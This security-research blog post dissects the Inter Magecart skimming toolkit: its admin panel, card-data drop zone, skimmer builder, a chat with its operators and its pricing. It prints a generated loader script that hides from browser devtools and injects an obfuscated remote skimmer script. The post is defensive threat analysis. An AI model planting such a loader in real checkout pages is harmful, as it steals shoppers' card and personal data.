HUMAN Blog

Skimming-as-a-Service: Anatomy of a Magecart Attack Toolkit

Written by HUMAN | March 31, 2020

We like to track Magecart attacks, and though there seem to be endless reports of persistent Magecart infections, the vast majority are low grade spray-and-pray operations that do not target specific stores. While following reports on these infections, we stumbled upon a very poorly maintained server connected to a very loud operation named Inter. Upon reverse engineering this server, we found ourselves in conversation with the hackers themselves who revealed much more information about the Inter toolkit operation. This blog post shares some of the findings and explores how digital skimming is evolving into a service.

What is Inter?

The Inter toolkit got into the headlines in late 2018 when its developer was seeking business opportunities in a busy cybercriminal forum. The new toolkit was being offered for about $1,300 and tried to entice “shop owners” – cybercriminals who had already compromised and gained access to an e-commerce store. Inter greatly simplified the process of infecting the checkout page and extracting credit card numbers (including CVV codes) from the payment forms. Launching a Magecart attack now did not require any special skills – just the financial means to buy the Inter toolkit and access to an e-commerce store or platform. As expected, this greatly increased the number of sites being compromised, and the number of Magecart hackers increased from a handful to a few hundred.

More recently, we stumbled upon another public forum that hinted that the Inter developers were still very active. Little did we know that we would have a chance to talk to them and hear their roadmap and their views on the skimmer market.


Figure: Communication from the Inter developers

Behind the Scenes of a Magecart Operation

Over the course of our research we stumbled upon several instances of Inter. The command and control (C2) domain showed a recognizable Inter admin panel login page with the red square in a blue circle logo. (This helped us later to track many more of these control panels.)


Figure: Login page for Inter admin panel with a recognizable red and blue logo


The server, due to careless server security by the owner, returned the directory tree of the app structure.

Figure: Directory structure for the Inter command and control server

Access to the file structure allowed us to investigate how the kit operates. First we found a very interesting file called superpost.txt in the tmp directory. This file was changing every couple of minutes, and it held the JSON schema with all the exfiltrated data from the e-commerce stores’ credit card numbers, CVV codes, email addresses, home addresses, telephone numbers, IP addresses and the referring site URLs. Weird? We thought this might be a backdoor, as toolkit developers often keep a way for themselves to get the valuable goods their customers steal. Later, we learned that this is a debugging feature that was mistakenly left open. Given the overall security posture of the site, we can believe this claim.

Inside the Inter Toolkit

The HUMAN research team thoroughly investigated and reverse engineered the site. By examining the templates and text, we found another site that appeared to be a staging or testing site, which was nearly wide open for anyone to log in, and we did. Most of the screenshots were taken from that demo site. In the course of this research, we made contact with the Inter developer who gave us a peek inside his own control panel. More on this later.

The Inter toolkit typically includes the following functionality:

  1. Admin panel with a CAPTCHA protected login (because you know, security first!).

  2. C2 drop zone URL, open to collect stolen credit card numbers.

  3. Pipelining the stolen credit card numbers.

    1. Adding geolocation data on the IP.

    2. Parsing the fields and adjusting names for a common view convention

  4. Filter and export functionality for credit card numbers.

  5. Automatic creation of a loader and a skimmer script.

    1. Skimmer (sniffer) field adjustment for each infected checkout page.

    2. Obfuscation for loader page including scanner evasions.

Figure: Screenshot provided by the Inter Coder (using Windows 7)

Here are some screenshots from inside the admin panel itself.

Figure: Skimmer creation widget with easily customizable checkout page form fields

Figure: Form for creating a loader page to inject the skimmer

This kit includes some basic evasion techniques. The additional checkbox allows obfuscating the kit using Caesar obfuscator. Caesar obfuscator alone is a $100 worth of a service sold in the darknet forums.

The following is an example of a generic loader script generated by the Inter toolkit.

(function() {
 "use strict";
 var e = {
 open: !1,
 orientation: null
 },
 n = 160,
 o = function(e, n) {
 window.dispatchEvent(new CustomEvent("devtoolschange", {
 detail: {
 open: e,
 orientation: n
 }
 }))
 };
 setInterval(function() {
 var t = window.outerWidth - window.innerWidth > n,
 i = window.outerHeight - window.innerHeight > n,
 d = t ? "vertical" : "horizontal";
 i && t || !(window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || t || i) ? (e.open && o(!1, null), e.open = !1, e.orientation = null) : (e.open && e.orientation === d || o(!0, d), e.open = !0, e.orientation = d)
 }, 500), "undefined" != typeof module && module.exports ? module.exports = e : window.devtools = e
})(), window.$sloaded = !1, setInterval(function() {
 if (!window.$sloaded && !window.devtools.open && "undefined" == typeof $s) {
 var e = document.createElement(atob("ca2NyffsaXB0"));
 e.src = atob("ZXd0dd2V0LmNvb="), e.type = atob("dGV4dsC9qYXZhc2sdfsdfNyaXB0="), document.getElementsByTagName("head")\[0\].appendChild(e), window.$sloaded = !0
 }
}, 500);

As you can see above, the loader script has logic to evade detection. If devtools/firebug is open, the loader won’t fetch and execute the skimmer.

Another form allows you to add aliases for additional fields. This allows the skimmer to be customized for each checkout page.

Figure: Customizable fields in the Inter skimmer toolkit

This page allows you to filter and export stolen credit card numbers, with a tested example.

Figure: Stolen credit card numbers visible in the Intern C2 panel

Conversations With a Skimmer

While rummaging around the server, the webmaster finally noticed the intrusion and decided to leave us their private Jabber ID on one of the accessible pages. Of course, we couldn't resist the temptation and started a friendly chat with them. During our chat, the webmaster actually turned out to be very communicative and shared a lot of information about their group.

According to them, their group hacked thousands of Magento shops by brute-forcing admin account passwords (not leveraging Magento vulnerabilities). Many of the same targets were also hacked by other groups that were skimming credit card numbers using Inter or alternative skimmers.

The rival groups were allegedly using fake checkout pages (a functionality provided by Inter). This is regarded by them as a lowlier form of skimming, since it prevents the transaction from going through, alerting the user that something isn’t right, which leads to it being quickly discovered by the site owner and removed, sometimes removing all of the concurrent skimmers on the site.

Also, the stolen credit card numbers were mostly good for a couple of transactions before being blocked, meaning that the multiple skimmers were compromising the profits of the group. This has led the group to declare war against the rivals and delete all web shells and fake admin accounts created by their competitors on hundreds of double or triple breached shops.

Magecart Economics

The Inter toolkit is being offered on the dark web for a discounted price of $1,000, including 24/7 support. If you need some more help setting it up, the developers are also offering a 30/70 revenue share option.

Cybercriminals are roughly divided into two extremes. At one end are the do-it-yourself kind. They will not buy any off-the-shelf tools, but instead build a customized skimmer themselves. They usually target a major brand and aim for a short-term heist of hundreds of thousands of cards from a single breach. The customized skimmer gives them more control and stealth in the operation.

At the other end of the spectrum are the script kiddies. Toolkits such as Inter are targeted towards this class of cybercriminals. The script kiddies are usually spraying around known exploits and easy to guess admin credentials to compromise online stores. Despite the ease of use of the Inter toolkit, they can be seen in the forums asking for help setting up the Magecart operation.

In their roadmap, the next step for Inter is to become a Skimming-as-a-Service operation. Each hacker will get an affiliate ID and access to the skimmer builder. The hacker will only need to adjust the skimmer sniffer fields to fit the infected checkout page form, and the rest of the infrastructure will be maintained solely by the Inter service. The stolen credit card numbers will be sent with an affiliate tag, and each number will be sold immediately just as it was used, before there is a chance to cancel it. The hacker only has to provide his favorite cryptocurrency wallet and get his cut of the sale – turning the whole operation into a steady revenue stream for both the hacker and the Inter developers.

For now, we are monitoring about nine of the final Inter drop zones. The ill-maintained server showed a daily pipeline of approximately 30 credit card numbers at the beginning of the month, including all user data and CVV codes. This translates to an estimated 800 credit card numbers each month. If the other servers are seeing similar yields, at a value of $15 per credit card number, this operation nets about $100,000 per month. As the COVID-19 situation has worsened and e-commerce has seen a significant increase in traffic, we expect this number to rise significantly over the next few weeks.

This is the first in a multi-part series of blog posts about the Inter skimming operation. Stay tuned for the next post where we will look at code obfuscation and other novel Magecart attack techniques.